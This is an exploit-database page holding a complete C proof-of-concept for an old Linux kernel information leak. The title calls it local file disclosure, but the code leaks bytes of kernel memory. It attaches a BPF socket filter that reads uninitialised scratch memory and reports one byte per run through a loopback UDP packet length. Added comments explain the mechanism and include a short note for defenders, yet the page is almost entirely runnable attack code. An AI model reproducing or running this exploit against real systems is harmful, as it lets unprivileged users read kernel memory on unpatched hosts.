R00TW0RM

Local File Disclosure 2.6.2* - 2.6.3*

Oct 3rd, 2011
  1. 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
  2. 0 _ __ __ __ 1
  3. 1 /' \ __ /'__`\ /\ \__ /'__`\ 0
  4. 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
  5. 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
  6. 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
  7. 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
  8. 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
  9. 1 \ \____/ >> Exploit database separated by exploit 0
  10. 0 \/___/ type (local, remote, DoS, etc.) 1
  11. 1 0
  12. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
  13.  
  14.  
  15. /*
  16. * Local File Disclosure
  17. * Linux Kernel 2.6.2* - 2.6.3*
  18. * By > CrosS
  19. * Greetz > r0073r , r4dc0re , Side^effects(1337day.com)
  20. * Ataman , S4(uR4 , Xenu , kokoko(r00tw0rm.com)
  21. */
  22.  
  23. #include <string.h>
  24. #include <stdio.h>
  25. #include <netinet/in.h>
  26. #include <sys/socket.h>
  27. #include <unistd.h>
  28. #include <stdlib.h>
  29. #include <linux/filter.h>
  30.  
  31. #define PORT 37337
  32.  
  /*
   * transfer - loop one UDP datagram from sendsock to recvsock over loopback.
   *
   * Calls fork(). The process in which fork() returns non-zero (the parent,
   * and also the caller itself if fork() fails with -1) blocks in recvfrom()
   * on recvsock and returns that call's result: the number of bytes
   * delivered, or -1 on error. The child sleeps one second so the receiver
   * is already waiting, sends 512 zero bytes to 127.0.0.1:PORT and exits
   * with status 0; it never returns to the caller.
   *
   * The payload content is never inspected. main() only uses the length
   * that recvfrom() reports, which is the value the socket filter attached
   * to recvsock returned for this packet.
   */
  int transfer(int sendsock, int recvsock)
  {
      struct sockaddr_in peer;
      char payload[512];
      int peer_len = sizeof(peer);

      memset(payload, 0, sizeof(payload));

      if (fork() == 0) {
          /* Child: give the receiver time to block, then send and quit. */
          sleep(1);

          memset(&peer, 0, sizeof(peer));
          peer.sin_family = AF_INET;
          peer.sin_port = htons(PORT);
          peer.sin_addr.s_addr = inet_addr("127.0.0.1");

          sendto(sendsock, payload, 512, 0, (struct sockaddr *)&peer, peer_len);

          exit(0);
      }

      /* Parent (or fork failure): wait for the datagram and report its size. */
      return recvfrom(recvsock, payload, 512, 0, (struct sockaddr *)&peer, &peer_len);
  }
  57.  
  /*
   * main - report one byte of a classic-BPF scratch-memory word.
   *
   * Takes a single argument, a byte offset in the range 0-63. It binds a UDP
   * socket to PORT, attaches a five-instruction socket filter to it, has
   * transfer() deliver one loopback datagram, and prints a byte derived from
   * the length recvfrom() returned.
   *
   * Despite the page title, nothing in this program opens or reads a file.
   * The only data it observes is the filter's return value.
   *
   * The filter loads scratch word M[offset / 4] with BPF_LD|BPF_MEM although
   * no instruction in the program ever stores to scratch memory, masks and
   * shifts out one byte, adds 256 and returns the sum as the number of
   * packet bytes to accept.
   *
   * Defender note: a load from a scratch slot with no earlier store on the
   * same path has no legitimate use, so it is a reasonable thing for a
   * filter validator or an audit of attached filters to reject or flag. The
   * header comment claims kernels 2.6.2* - 2.6.3* are affected; a kernel
   * that zeroes the scratch array or refuses such a filter at attach time
   * would presumably print only zeros or fail at setsockopt() here. Verify
   * against the changelog of the kernel actually deployed.
   *
   * Returns -1 on a usage, socket, bind or setsockopt failure. Otherwise it
   * falls off the end of main.
   */
  int main(int argc, char * argv[])
  {
      int tx_fd, rx_fd, nread;
      unsigned int offset;
      unsigned int shift;
      struct sockaddr_in local;
      struct sock_fprog prog;

      if (argc != 2) {
          printf("[*] Usage: %s offset (0-63)\n", argv[0]);
          return -1;
      }

      /* A negative argument wraps to a large unsigned value and is rejected. */
      offset = atoi(argv[1]);
      if (offset > 63) {
          printf("[*] Inv4liD by7e oFfs3t (must be 0-63)\n");
          return -1;
      }

      rx_fd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
      tx_fd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
      if (rx_fd < 0 || tx_fd < 0) {
          printf("[*] CoulD no7 Cre4t3 soCke7s.\n");
          return -1;
      }

      memset(&local, 0, sizeof(local));
      local.sin_family = AF_INET;
      local.sin_port = htons(PORT);
      local.sin_addr.s_addr = htonl(INADDR_ANY);

      if (bind(rx_fd, (struct sockaddr *)&local, sizeof(local)) < 0) {
          printf("[*] CoulD no7 biNd soCke7.\n");
          return -1;
      }

      /* Bit position of the requested byte inside its 32-bit scratch word. */
      shift = (offset % 4) * 8;

      struct sock_filter insns[5] = {
          /* A = M[offset / 4]; no store to M[] precedes this load. */
          BPF_STMT(BPF_LD|BPF_MEM, (offset & ~0x3) / 4),
          /* Keep only the requested byte ... */
          BPF_STMT(BPF_ALU|BPF_AND|BPF_K, 0xff << shift),
          /* ... and move it down to bits 0-7. */
          BPF_STMT(BPF_ALU|BPF_RSH|BPF_K, shift),
          /* Bias by 256 so the accept length is never zero (zero = drop). */
          BPF_STMT(BPF_ALU|BPF_ADD|BPF_K, 256),
          /* Return A: the byte is now encoded in the accepted length. */
          BPF_STMT(BPF_RET|BPF_A, 0),
      };

      memset(&prog, 0, sizeof(prog));
      prog.len = 5;
      prog.filter = insns;

      if (setsockopt(rx_fd, SOL_SOCKET, SO_ATTACH_FILTER, &prog, sizeof(prog)) < 0) {
          printf("[*] F41leD 7o 1nstaLl fiLteR y0u m0f0 h3aD.\n");
          return -1;
      }

      nread = transfer(tx_fd, rx_fd);

      /*
       * 248 = 256 - 8. Presumably the 8 is the UDP header, which the filter's
       * length counts but recvfrom()'s return does not. TODO confirm.
       * A failed recvfrom() (-1) is not distinguished from data here.
       */
      printf("[*] Your byte: 0x%.02x\n", nread - 248);

  }